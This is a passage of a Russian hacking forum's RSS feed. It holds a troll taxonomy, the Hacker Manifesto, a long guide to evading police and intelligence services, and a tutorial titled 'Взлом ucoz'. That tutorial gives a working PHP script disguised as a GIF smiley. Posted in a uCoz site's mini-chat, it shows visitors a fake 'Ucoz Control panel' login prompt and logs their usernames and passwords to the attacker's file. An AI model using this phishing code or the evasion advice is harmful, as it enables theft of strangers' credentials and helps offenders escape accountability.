недостаток или ошибку: «Я думаю, „Бумер“ — лучшее кино».&lt;br /&gt;Просьба о помощи с неправдоподобной или неблаговидной задачей или проблемой: «Как вымыть ночной горшок? Я не хочу, чтобы всё приготовленное в нём было одинаковым на вкус». «Научите меня программировать за вечер».&lt;br /&gt;Преднамеренно наивные вопросы: «Могу ли я использовать оливковое масло вместо воды, готовя вермишель?»&lt;br /&gt;Тщательно сконструированные и чётко аргументируемые размышления и теории, базирующиеся на явно неверном утверждении или выдуманном факте.&lt;br /&gt;Предложение решить «занимательную задачу» с заведомо некорректно или неполно сформулированным условием, порождающее обширные дискуссии по поводу интерпретации. Пример — задача о самолёте.&lt;br /&gt;Политически спорные сообщения: «Я думаю, Путин — лучший/худший президент среди всех».&lt;br /&gt;Разыгрывание невинности по окончании флейма.&lt;br /&gt;Офтопик-жалобы на личную жизнь или угрозы самоубийства — временами не что иное, как «кричащий о помощи» тролль.&lt;br /&gt;Обобщающие параноидальные ответы на личные мнения, выраженные людьми: «Не может быть, что вы все действительно так думаете, на самом деле вы объединяетесь против меня».&lt;br /&gt;Умышленная игра на чувствах людей в связи с направленностью сообщества: например, появление в форуме любителей кошек с темой «Десять блюд из кошатины».&lt;br /&gt;Одновременное использование нескольких ников для раздувания собственного флейма — споры с самим собой, участие в перепалке с обеих сторон и тем самым её искусственное подогревание.&lt;br /&gt;Тролль — «герой-любовник»: получает острые ощущения от последовательного заигрывания и интриг онлайн с женщинами группы. Это подстрекает общественную конкуренцию среди женщин, которые когда-то думали, что ласковые имена, стихи, признания в любви посвящались исключительно им. Также зачастую наивная реакция женщин на его действия провоцирует мужчин группы на следование его манере и соревнование в завоевании женского внимания, что в итоге приводит к тому, что преобладающая часть группы концентрируется на флирте, и группа перестаёт выполнять свою основную цель.&lt;br /&gt;Любая комбинация вышеизложенного: например, тролль объединяет подстрекательские утверждения с бедностью языка и манерой падонков, попутно играя любовника.&lt;br /&gt;Мотивация&lt;br /&gt;Признающие себя «троллями» могут преподносить себя как «адвокатов дьявола» («оводы», «деятели контркультуры», «форумварриоры»), бросая вызов общественному мнению в попытке сломать групповой статус-кво. Утверждают, что настоящие «адвокаты дьявола» всегда идентифицируют себя как таковые, из уважения к этикету и любезности, в то время как тролли игнорируют этикет и любезность в целом.&lt;br /&gt;Предполагаемые мотивы человека, занимающегося троллингом:&lt;br /&gt;Троллинг может использоваться в качестве эксперимента, при котором вследствие анонимности есть возможность испытать границы терпения людей и нарушить правила этикета без серьёзных последствий. Это может быть желанием убедиться в прочности рамок дискуссии или попыткой проверить реакцию людей.&lt;br /&gt;Анонимный поиск внимания: тролль стремится доминировать в дискуссии, вызывая гнев.&lt;br /&gt;Развлечение: некоторых забавляет мысль, что человека задевают утверждения совершенно незнакомых людей.&lt;br /&gt;Гнев: использование троллинга с целью выразить враждебность группе или некоей точке зрения.&lt;br /&gt;Крик о помощи: многие тролли в своих сообщениях жалуются на жизнь — семья, отношения, школа, работа, здоровье (хотя в принципе невозможно знать, является ли это только частью троллинга).&lt;br /&gt;Самоидентифицирующие себя в качестве троллей и их защитники считают, что троллинг является продвинутым методом улучшить обсуждение или соотношение сил.&lt;br /&gt;Вызов: просто хочется убедиться, способен ли на такое, и можно ли в этом добиться успеха — например, дурачить пользователей, создав другой ник и личность.&lt;br /&gt;Трата времени других: одна из самых привлекательных целей троллинга — потратить как можно меньшие усилия и время на то, чтобы спровоцировать других на бессмысленную трату как можно больших усилий и времени.&lt;br /&gt;Изменения во взглядах всей группы: раздуть обсуждаемый вопрос до такой степени (обычно с использованием клонов), чтобы заставить людей пересмотреть собственные взгляды на него.&lt;br /&gt;Проверка работы системы: например, чтобы увидеть, как отреагируют на явное нарушение те, кто следит за порядком.&lt;br /&gt;Преодоление комплекса неполноценности или беспомощности путём получения опыта управления окружающей средой, пускай даже виртуальной.&lt;br /&gt;Самоутверждение.&lt;br /&gt;Сатира: в этих случаях люди считают себя не троллями, а неправильно понятыми юмористами или политическими комментаторами.&lt;br /&gt;Удовлетворение, получаемое от личных нападок (садизм).&lt;br /&gt;Преследование: если человек был мишенью нападок на одном форуме и сменил его на другой во избежание их продолжения, троллинг используется как средство вернуть ему ощущение дискомфорта онлайн.&lt;br /&gt;Охотники на троллей: этот тип пользователей зачастую наносит не меньший ущерб, чем сам тролль. Одно сообщение тролля может остаться незаметным, но десять охотников на троллей, незамедлительно отреагировав, в состоянии свести на нет любую дискуссию.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:48:42 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=44#p44</guid>
		</item>
		<item>
			<title>Взлом ucoz</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=43#p43</link>
			<description>&lt;p&gt;0 + &lt;br /&gt;V &lt;br /&gt;# &lt;br /&gt;M &lt;br /&gt;% &lt;br /&gt;P &lt;br /&gt;X &lt;br /&gt;! &lt;br /&gt;Итак, начнем... &lt;br /&gt;Для начала нажно зарегистировать хост с поддержкой php (например &lt;a href=&quot;http://mysite.phphost.net&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://mysite.phphost.net&lt;/a&gt;) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif). &lt;br /&gt;Затем откройте блокнот, да простой блокнот и напишите следующее:&lt;br /&gt;&amp;lt;? &lt;br /&gt;header(&amp;quot;Content-type: image/gif&amp;quot;); &lt;br /&gt;$image = imagecreatefromgif(&#039;cool.gif&#039;); &lt;br /&gt;if(!$_COOKIE[&#039;LOGON&#039;]) &lt;br /&gt;{ &lt;br /&gt;$login = $_SERVER[&#039;PHP_AUTH_USER&#039;]; &lt;br /&gt;$pass = $_SERVER[&#039;PHP_AUTH_PW&#039;]; &lt;br /&gt;if(strlen($pass) &amp;lt;= 4 || !$login) &lt;br /&gt;{ &lt;br /&gt;Header(&#039;HTTP/1.1 401 Unauthorized&#039;); &lt;br /&gt;Header(&#039;WWW-Authenticate: Basic realm=&amp;quot;Ucoz Control panel&amp;quot;&#039;); &lt;br /&gt;} &lt;br /&gt;elseif($login) &lt;br /&gt;{ &lt;br /&gt;setcookie(&#039;LOGON&#039;,md5($pass)); &lt;br /&gt;$f = fopen(&#039;passwords.txt&#039;, &#039;ab&#039;); &lt;br /&gt;fwrite($f, $login.&amp;quot; ||| &amp;quot;.$pass.&amp;quot;\r\n&amp;quot;); &lt;br /&gt;fclose($f); &lt;br /&gt;} &lt;br /&gt;} &lt;br /&gt;imagegif($image); &lt;br /&gt;imagedestroy($image); &lt;br /&gt;?&amp;gt;&lt;br /&gt;Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. &lt;br /&gt;Теперь выбирайте любой юкозовский сайт, например &lt;a href=&quot;http://target.ucoz.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://target.ucoz.ru/&lt;/a&gt; слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:&lt;br /&gt;&lt;a href=&quot;http://mysite.phphost.net/smile.gif&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://mysite.phphost.net/smile.gif&lt;/a&gt;&lt;br /&gt;И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это &lt;a href=&quot;http://target.ucoz.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://target.ucoz.ru/&lt;/a&gt;) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.&lt;br /&gt;Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандартно созданный юкозовский сайт без доп. своих настроек будет уязвим.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:46:26 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=43#p43</guid>
		</item>
		<item>
			<title>Манифест Хакера</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=41#p41</link>
			<description>&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;Манифест хакера (англ. Hacker Manifesto, The Conscience of a Hacker) — текст, написанный 8 января 1986 года хакером Ллойдом Блэнкеншипом, более известным как Наставник (англ. The Mentor) после его ареста агентами ФБР. Немного позже этот текст (вскоре ставший программным документом для хакеров всего мира) был включён в седьмой номер электронного журнала Phrack[1]. Автор ярко и красноречиво обозначает основные ценности культуры хакера, а именно: безразличие к цвету кожи, национальности и религии, превосходство знаний и нестандартного образа мыслей, безграничная свобода информации, информации для исследования, изучение из любопытства.

В 1995 году отрывок из Манифеста был зачитан в фильме «Хакеры»; этот отрывок был взят из поздней, не совсем верной редакции из журнала 2600. Также манифест воспроизведён внутри коробки компакт-диска компьютерной игры Uplink. В игре Culpa Innata данный документ присылают по почте главной героине в случае, если она откажет дать гражданство одной из иммигранток, в прошлом бывшей хакерше.&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
						&lt;p&gt;Ещё одного поймали сегодня, это во всех газетах. &lt;br /&gt;«Подросток арестован за компьютерное преступление», «Хакер арестован за взлом банка». &lt;br /&gt;Чёртовы дети… Они все одинаковы. &lt;br /&gt;Но вы, с вашей трёхэлементной психологией и техномозгом 50-х годов, вы смотрели когда-нибудь в глаза хакеру? Вы когда-нибудь задумывались, что заставляет его двигаться, какие силы сформировали его? &lt;br /&gt;Я — хакер, войдите в мой мир… &lt;br /&gt;Мой мир начинается со школы. Я умнее большинства других детей; та чушь, которой учат нас в школе, скучна. &lt;br /&gt;Чёртов недоносок… Они все одинаковы. &lt;br /&gt;Я в средних или старших классах. Слушаю учительницу, которая в пятнадцатый раз объясняет, как сокращать дробь. Да понял я уже. «Нет, мисс Смит, я не покажу вам мою работу. Я сделал её в уме…» &lt;br /&gt;Чёртов ребенок, наверняка списал. Они все одинаковы. &lt;br /&gt;Сегодня я сделал открытие. Я открыл компьютер. Секунду… это здорово! Он делает то, что я хочу. Если он совершает ошибку — это потому что я напортачил. Не потому, что я ему не нравлюсь… &lt;br /&gt;Или он запуган мной… &lt;br /&gt;Или думает, что я слишком умный… &lt;br /&gt;Или не любит учиться и не должен быть здесь… &lt;br /&gt;Чёртов мальчишка. Всё что он делает — играет в игры. Они все одинаковы. &lt;br /&gt;И это случилось… дверь в мир распахнулась… посланный электронный импульс рванулся по телефонным линиям, как героин по венам наркомана; убежище от повседневной некомпетентности найдено. «Это оно… То, к чему я принадлежу». Я знаю здесь каждого… даже если я никогда не встречал его, никогда не говорил с ним и могу больше никогда его не услышать… Я знаю вас всех… &lt;br /&gt;Чёртов пацан, опять занимает телефонную линию. Они все одинаковы. &lt;br /&gt;Вы готовы поклясться своей задницей, что мы все одинаковы. В школе нас всех кормили детским питанием с ложечки, в то время как нам хотелось бифштекса… Те кусочки мяса, что нам доставались, были разжёваны и безвкусны. Над нами доминировали садисты, и нас игнорировали равнодушные. Те немногие, кто могли чему-то научить, находили в нас желанных учеников, но они были как капли воды в пустыне. &lt;br /&gt;Теперь это наш мир… Мир электронов и переключателей, мир красоты бодов. Мы используем существующие системы, не платя за то, что могло быть дешевле грязи, если бы не управлялось грязными спекулянтами, и вы называете нас преступниками. Мы исследуем, и вы называете нас преступниками. Мы ищем знания… и вы называете нас преступниками. Мы существуем без цвета кожи, без национальности, без религиозных распрей… и вы называете нас преступниками. Вы строите атомные бомбы, вы развязываете войны, убиваете, жульничаете и лжёте нам, пытаясь заставить нас поверить, что всё это — для нашего же блага, и мы всё ещё преступники. &lt;br /&gt;Да, я преступник. Моё преступление — любопытство. Моё преступление в том, что я сужу людей не по тому, как они выглядят, а по тому, что они говорят и думают. Моё преступление в том, что я намного умнее вас. Это то, что вы мне никогда не простите. &lt;br /&gt;Я хакер. И это мой манифест. Вы можете остановить одного из нас, но вам не остановить нас всех… в конце концов, мы все одинаковы.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:37:47 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=41#p41</guid>
		</item>
		<item>
			<title>Мануал, для юных хакеров</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=40#p40</link>
			<description>&lt;p&gt;Не проходит буквально ни одной недели, чтобы в Интернет-новостях не появилось сообщение об успешном задержании спецслужбами очередного компьютерного преступника. Причем, чаще всего речь идет не о бестолковых рассыльщиках троянов, а о достаточно грамотных и, если можно так сказать, профессиональных хакерах, наверняка, уделявших собственной безопасности не последнее место. Достаточно упомянуть Линн Хтуна из знаменитой группы «Fluffi Bunni» («Пушистый кролик») и членов интернациональной кракерской организация DrinkOrDie.&lt;br /&gt;Казалось бы, времена Митника давно прошли и пора бы уже сделать определенные выводы, касающиеся собственной безопасности. Так в чем же дело? За счет каких механизмов спецслужбам удается столь эффективно отслеживать и «уничтожать» информационных «преступников»? В каких лабиринтах мировой паутины затаилась скрытая угроза? Чего следует опасаться хакеру? Об этом сегодня мы и поговорим. Я детально проанализировал возможные ошибки и пути отлова хакеров на сегодняшний момент, результаты моих «исследований» лежат пред тобой. Но не исключено, что в чем-то я могу сильно ошибаться, т. к. точное заключение может дать только эксперт, который непосредственно «крутится» в сфере государственной безопасности, но от них мы никогда ни чего не узнаем.&lt;br /&gt;Неуязвимость — это иллюзия&lt;br /&gt;Совершив не один десяток взломов и не попавшись в руки правосудия у многих молодых хакеров возникает иллюзия собственной супер секьюрной безопасности. На самом деле, это объясняется только тем, что ты еще пока не понадобился «нужным» людям. Спецслужбы не будут предпринимать ни каких действий, пока не заподозрят в твоих деяниях угрозу национальной безопасности или пока не увидят у себя на столе заявление от пострадавших (не исключено также, что ты уже «ходишь» под колпаком, просто не догадываешься об этом ). Обычно, хакеру играет на руку, что большинство отхаканных не обращается «куда следует», а предпочитают промолчать и забыть о взломе. Например, кому охота связываться с федералами из-за какого-то там дефейса, или какой прикол админу сообщать начальству, что на его серверах хакеры пооткрывали себе шеллы — ему же в первую очередь и влетит, поэтому он по-тихому залатает дыры и сделает вид, что ничего не было. Многие компании не хотят заводить дело, т. к. бояться, что информация о взломе станет доступна общественности, а это может принести дополнительные убытки из-за подпорченной репутации. Нельзя также исключать наличие организаций, которые вообще ни при каких обстоятельствах не будут связываться со спецслужбами, т. к. сами имеют определенные грешки. Но так бывает не всегда и даже такое, по сути, мелкое хулиганство как дефейс может стать причиной преследования спецслужб. Например, действия группы Fluffi Bunni привлекли внимание ФБР после терактов 11 сентября, когда на множестве сайтов появились лозунги «Fluffi Bunni Goes Jihad» (&amp;quot;пушистый кролик идёт на джихад&amp;quot;). Это было расценено как протест против американской глобальной кампании по борьбе с терроризмом, т. е. по сути членов группы уровняли с террористами (а это уже не шуточные сроки).&lt;br /&gt;Таким образом, можно выделить особую категорию хакерских проделок, которые ПОЧТИ всегда становятся работой спецслужб — это воровство, вымогательство, шпионаж и «наезд» на государственные сервера. Людей в штатском может привлечь и просто высокая хакерская активность, например, огромный список дефейсов на «хакерском» сайте. Обычно, общение со спецслужбами, в этом случае, ограничивается без инициативным обыском в квартире хакера или разговор «по душам» с ярко светящей в глаза лампой (немало таких историй можно почитать на хакерских сайтах. Надо полагать, что цель таких мер связана с профилактикой, т. е. показать хакеру, что он находится под контролем и пресечь возможные будущие, более тяжкие преступления. Если это так, то нужно только снять защитный экран с монитора перед нашими родными спецслужбами за заботу о подрастающем поколении.&lt;br /&gt;Вывод первый: профессионалы никогда не чувствуют себя в безопасности, паранойя — вечный спутник хакера.&lt;br /&gt;Не существует &amp;quot;своих&amp;quot; и &amp;quot;чужих&amp;quot; спецслужб&lt;br /&gt;Среди многих отечественных представителей андеграунда существует одно ошибочное убеждение, что если не трогать российские сервера, то за собственную безопасность можно вообще не бояться. Да, действительно, неурегулированные законы об экстрадиции хакеров из России, в большинстве случаев позволяют отечественным спецслужбам игнорировать просьбы о сотрудничестве своих зарубежных коллег и даже вступать с ними в конфронтацию. Широко известна история, когда следователь Игорь Ткач из Управления ФСБ чуть не возбудил уголовное дело против агента ФБР Майкла Шулера после ареста последними двух Челябинских хакеров Алексея Горшкова и Василия Иванова (с деталями дела можно ознакомиться в Интернете, в т. ч. и на нашем сайте). Но время не стоит на месте и однажды все может измениться, и тогда тебе напомнят все твои грешки, к тому же ты уже сейчас лишаешь себя возможности безбоязненного выезда за рубеж (не обязательно в США), т. к. тебя там уже могут ждать. Пример тому, недавняя история с 25-летним украинским хакером, который, был пойман в Бангкоке при содействии Таиландских и Американских спецслужб. Большинство хакеров xUSSR попадают в руки правосудия именно за пределами своей родины (примеров тому можно приводить много).&lt;br /&gt;Вывод второй: профессионалы не проводят грань между российскими и зарубежными спецслужбами — спецслужбы всех стран одинаково опасны для хакера. Практика показывает, что иностранные спецслужбы представляют собой большую угрозу, т. к. уж очень сильно «там» не любят отечественных хакеров.&lt;br /&gt;Схема хакерской атаки&lt;br /&gt;Рассмотрим типичную схему хакерской атаки (взлом) в Интернете.&lt;br /&gt;Хакер выходит в сеть через обычного провайдера, затем через цепочку анонимных proxy к удаленному шеллу и уже с шелла проводит атаку. Шеллом обычно является захваченная (поrootанная) машина или скарженная на хостинге торгующего шеллами. В приведенном случае, задача шелла не анонимность, а обеспечение ресурсами, т. к. шелл обычно располагается на мощном сервере с приличным каналом. Конечно, эта не единственная схема: цепочку анонимных прокси может заменить цепочка из одних только шеллов или шелл, в схеме, вообще может отсутствовать, также прокси-сервера могут идти только от удаленного шелла до цели (это если хакер хочет сохранить шелл) и т. п. Непрофессионалы вообще ограничиваются единственным прокси. Кроме того, хакер может выходить в Интернет через локальную сеть (например, из Интернет-кафе). Но в данном контексте это все не существенно и приведенного рисунка достаточно чтобы рассмотреть большинство опасностей и слабых мест, которые могут подстерегать хакера в плане собственной безопасности.&lt;br /&gt;Не все анонимные прокси одинаково анонимны&lt;br /&gt;Начнем с середины — с proxy-серверов. Частенько можно услышать мнение, что если сидеть за цепочкой proxy, которые будут расположены в разных частях света, то это обеспечит практически 100% анонимность. При этом правда отмечается, что прокси имеют свойства вести логи и по логам, в принципе, можно восстановить всю цепочку. Уже одно это утверждение не дает 100% анонимности, т. к. если распутыванием займутся серьезные люди, то довести дело до конца у них есть все шансы, даже самых несговорчивых админов можно купить, запугать, хакнуть, наконец, сам proxy-сервер и выудить логи. Здесь главное время, т. к. логи имеют свойство удаляться, а прокси-сервера бесследно исчезать. Но это было бы пол беды, т. к. по неподтвержденным слухам большинство анонимных proxy принадлежат самим спецслужбам (!). Это логично, т. к. если кто-то хочет анонимности, значит, ему есть что скрывать, а если есть что скрывать, значит, это либо террорист, либо хакер (а для спецслужб некоторых стран это вообще одни и те же понятия). Отсюда должно быть понятно стремление федералов контролировать эти самые прокси-сервера. Да и как объяснить ТАКОЕ количество анонимных прокси в Интернете — ведь хоть убей не пойму, какая может быть выгода от этого их хозяевам. Если бесплатные почтовые службы или поисковые системы еще могут жить за счет рекламы, то кроме IP-адреса прокси-сервера, клиент совершенно ни чего не знает о последнем (если конечно proxy не анонимайзер). Кстати, этому есть и косвенные подтверждения, ни однократно были замечены случаи, когда анонимный прокси-сервер делал попытку подключиться к клиенту, например, на 139 порт (файервол это отлично фиксирует). Как ты думаешь, что может понадобиться АНОНИМНОМУ ПРОКСИ-СЕРВЕРУ на 139 порту?!&lt;br /&gt;«Возможно, proxy контролируются спецслужбами, поэтому рекомендуем использовать только те, которые расположены за пределами России (СНГ) и стран НАТО». Однако этот совет не может быть хорошим. Ведь, что мешает создать разветвленную сеть «анонимных» proxy-серверов по всему миру, например, российским спецслужбам? Ничего. Причем прокси-сервера можно располагать прямо в посольствах (наверняка там тусят свои админы). А, учитывая, что постоянное подключение к Интернету имеют около 140 стран, то создать рассредоточенную сеть обойдется в совсем небольшие деньги даже для России, а про USA я вообще молчу. А если эти прокси-сервера еще к тому же будут иметь приличную скорость и все возможности, типа SOCKS5? Ведь не секрет, что большинство хакеров отбирают proxy по скорости. Возможно также, что сеть прокси-серверов совместно используется спецслужбами всех стран, что-то вроде Интерпола. Но сдается мне, что, все-таки, большинство «анонимных» прокси-серверов принадлежат одной великой супер-державе, догадайся какой? Поэтому, наверное, не стоит рассла@@@@@ся, если прокси из твоей цепочки расположены в Нигерии, Японии, Финляндии и т. д., т. к. вполне может случиться так, что они будут принадлежать одной спецслужбе.&lt;br /&gt;Смотри как удобно в этом плане федералам.&lt;br /&gt;Даже если в цепочку попадает сервер, не принадлежащий им, то это не проблема, т. к. достаточно выяснить с какого из своих серверов к нему могло осуществляться подключение. Конечно, если в цепочке окажутся идущие подряд два и более чужих прокси-сервера, то тут придется договариваться с их админами (как это может делаться, смотри выше). Кстати, возможно именно контролирование большинства прокси в Интернете позволяет спецслужбам делать в считанные дни официальные заявления, о том, из какой страны осуществлялась хакерская атака или откуда пошло распространение вируса и т. д., причем вплоть до таких экзотических стран как Филиппины. Возможно также, что подконтрольные прокси в странах НАТО входят в систему Эшелон.&lt;br /&gt;Что такое Эшелон?&lt;br /&gt;Эшелон — американская сеть глобального электронного шпионажа. Эшелон может перехватывать информацию, передаваемую практически по любым каналам связи (спутниковым, цифровым) в любой точке планеты. Источниками информации служат Интернет, электронная почта, телефон, факс, телекс. Эшелон — включает в себя более ста спутников-шпионов, большое количество суперсовременных и мощных компьютеров, множество наземных станций, расположенных по всему миру, на которых работают десятки тысяч сотрудников — программисты, криптологи, математики, лингвисты... Принцип работы системы Эшелон приблизительно следующий: каналы связи постоянно сканируются сверхмощными компьютерами, если проходящее сообщение содержит ключевое слово, выражение или тембр голоса (например, голос Бин Ладена), которое входит в так называемый словарь Эшелона, то сообщение записывается. Словарь Эшелона содержит огромное количество ключевых «слов» на многих языках мира и постоянно обновляется.&lt;br /&gt;Вывод третий: профессионалы не доверяют прокси.&lt;br /&gt;Шеллы и горшочки меда&lt;br /&gt;Именно из-за недоверия к анонимным прокси некоторые «продвинутые» хакеры предпочитают заменять их цепочкой шеллов. Однако и шеллы таят в себе немалые опасности. Если ты слышал о проекте Honeynet, то должен был уже давно понять, то, что я сейчас хочу сказать.&lt;br /&gt;Что такое Honeynet?&lt;br /&gt;Honeynet — сеть машин, специально предоставленная для взлома, для т. н. черных шляп, с целью анализа и изучения их техники. Кроме того, с теми же целями используются и отдельные машины, которые называют honeypots (медовые горшочки).&lt;br /&gt;Проекты Honeynet поддерживаются в основном энтузиастами, однако, было бы наивно полагать, что если это пришло в голову обычным специалистам по безопасности, то не могло придти в голову спецслужбам, которые получают деньги за изобретение подобных штучек. Вообще, подобная тактика с «подсадными утками» является коронным приемом федералов не только в сети. Главная трабла для хакера в том, что очень сложно отличить, является ли используемый им шелл медовым горшочком или полноценным шеллом. Так, в Honeynet предусмотрен даже случай захвата или отключения хакером отдельного сервера логов (syslog-сервера). Причем, не имеет значения, был ли захвачен шелл нестандартным способом или через поисковик по известной баге, напомню, что Honeynet строится на стандартных системах без всякого намека на снижение безопасности. Единственное, что может отличать настоящий шелл от медового горшка это ограничение на количество исходящих соединений (в Honeynet предлагается разрешение в 5-10 соединений), это делается с целью защиты от использования шелла для сканирования других систем, проведения DoS и т. д., хотя, в принципе, такие ограничения могут присутствовать и на обычной машине. Скарженному шеллу доверять не менее опасно, т. к., во-первых, неизвестно под чьим контролем находится хостинг, во-вторых, все действия могут логгироваться. Фейковые шеллы могут нести и косвенную опасность. Например, если в IRC у одного из участников установлен BNC на подобном шелле, то спецслужбам не составит особого труда читать все сообщения в чате, а значит, все участники канала попадают под удар (об этом, кстати, забавно написано в одном из материалов Honeynet).&lt;br /&gt;Вывод четвертый: профессионалы не доверяют шеллам.&lt;br /&gt;Подконтрольные провайдеры&lt;br /&gt;В большинстве случаев спецслужбам удается установить IP-адрес хакера, но это ничего не значит, т. к. главная цель — узнать ФИО «преступника» и возможно дом. адрес. Здесь все упирается в провайдера, т. к. только провайдер может сказать, кому принадлежит IP, а в случае с DialUP — с какого телефона осуществлялось подключение. Если хакер находится в России, то российским спецслужбам в этом плане значительно проще (практически все отечественные провайдеры находятся под контролем российских спецслужб). Но не нужно считать, что иностранным спецслужбам вообще ни как не удастся установить твою личность. Если совершенный тобой хак будет достаточно серьезным, то не исключено, что спецслужбам обоих сторон удастся договориться. Если нет, то тебя будут вычислять по косвенным признакам. Например, если после совершенного взлома, ты, пользуясь одной и той же цепочкой прокси, заказываешь себе домой на amazon.com какой-нибудь стафф, то, в случае, если дело ведут американские спецслужбы, им не составит ни какого труда «надавить» на админов магазина, с требованием выдать твой адрес (в свете 11 сентября это вообще не проблема, достаточно объявить тебя террористом). Короче, пока в Интернете есть хоть немного личной информации о тебе, ее могут раскопать, способов для этого много и спецслужбы ими должны хорошо владеть (не забывай, что вполне реально хакнуть и самого провайдера). Не удивляйся тогда, если в аэропорту какого-нибудь Дублина к тебе подойдут люди в черном, наденут наручники и зачитают (или запинают) твои права.&lt;br /&gt;Есть еще одна опасность, о которой почему-то многие Х забывают — речь идет о СОРМ&lt;br /&gt;Что такое СОРМ?&lt;br /&gt;СОРМ расшифровывается как «система оперативно-розыскных мероприятий», подразделяется на две системы: СОРМ-1 и СОРМ-2. Первая предназначена для контроля телефонной связи, вторая анализирует Интернет-трафик. В соответствии с документами, Интернет-провайдер на свои деньги был обязан установить оборудование, программы и выделенную линию для местного отделения ФСБ, а также провести обучение сотрудников. Все это позволяет последним отслеживать, перехватывать и прерывать связь любого клиента этого провайдера. На данный момент практически все российские провайдеры провели данные работы. Принцип функционирования СОРМ-2 похож на принцип работы Эшелона, т. е. подобным образом происходит обработка и накопление информации по ключевым словам. Системы подобные СОРМ существуют во многих других странах, например, в США — это Carnivore. Более подробную информацию об оборудовании и принципах работы СОРМ, можно посмотреть, например, здесь:&lt;br /&gt;Если ты уже скомпрометирован, то не составит особого труда настроить эту систему на постоянное слежение за тобой. Здесь хочу отметить: меня просто умиляют люди, которые пересылают в открытом виде или в простых архивах — троянов, вирей, червей и прочий вредоносный стафф. Сейчас многие провайдеры (про бесплатные почтовые службы я вообще молчу) устанавливают антивирусы, поэтому без всяких СОРМ тебя можно повязать, статьи 272, 273 могут обеспечить зажигательный отдых в местах не столь отдаленных до 3 лет + штраф.&lt;br /&gt;Вывод пятый: профессионалам, которые ни когда не хакали из одного и того же места, в обязательном порядке использовали АнтиАОН и пересылали любую компрометирующую информацию в зашифрованном виде, удавалось на неопределенное время оттягивать свое пребывание на свободе.&lt;br /&gt;Засланцы&lt;br /&gt;Есть еще один род опасности, о котором многие, в частности, молодые дефейсеры, даже не задумываются — это засланцы от федералов. Представь, ты общаешься в чате, обсуждаешь предстоящие или совершенные взломы, радуешься жизни, а в это время один из участников, причем которого все считают за своего, бережно сохраняет логи и пересылает их на доклад вышестоящему начальству. Затем вы собираетесь в реале, бухаете, оттягиваетесь, а в это время неизвестный человек, который уже заранее знал о вашей встрече, делает снимки скрытой камерой и т. д. Я, думаю, ты понял, куда я клоню. Стать своим в российских т. н. «хакерских» тусах совсем не сложно, достаточно похвастаться парочкой дефейсов и тебе откроются самые приватные базары. В зарубежных сложнее, нужно сделать что-то существенное, чтобы на тебя обратили хоть немного внимания (но для спецслужб это не должно быть проблемой). Засланцы внедрены во многие преступные группировки, шпионы работают на секретных предприятиях иностранных государств, доносчики следят за высокопоставленными лицами... было бы странно, если бы спецслужбы не догадались внедрить своих людей и в хакерское сообщество. Возможно, многие, кто сейчас отдыхает на нарах, ломают голову: «В чем же была моя ошибка? Как меня смогли повязать?» и даже не думают, что тот прикольный чел в IRC, с которым они вместе рутили не один десяток машин является самым настоящим двуличным засланцем.&lt;br /&gt;Вывод последний: профессионалы объединяются в команды и ведут приватные разговоры только с теми, в ком уверены на все 100%&lt;br /&gt;Слово в заключении&lt;br /&gt;Заметь, в статье не было никаких прямых рекомендаций, советов и пр., никто не читал тебе проповеди, не отговаривал от совершения черных дел и уж тем более не толкал на преступления. Статья рассчитана на думающих людей, надеюсь, ты относишься к их числу.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Mr. Eugene)</author>
			<pubDate>Mon, 16 Oct 2017 16:36:22 +0300</pubDate>
			<guid>http://postoblog.mybb.ru/viewtopic.php?pid=40#p40</guid>
		</item>
		<item>
			<title>Искусство кибервойны</title>
			<link>http://postoblog.mybb.ru/viewtopic.php?pid=39#p39</link>
			<description>&lt;p&gt;Создание U.S. Cyber Command в 2010 году ознаменовало факт того, что киберпространство является еще одной областью военных действий, пишет издание Intenret Evolution. Компьютер не только мишень, но и оружие. Более того, люди, ответственные за национальную безопасность, должны как можно скорее озаботиться внесением кибервойны в военную доктрину.&lt;/p&gt;
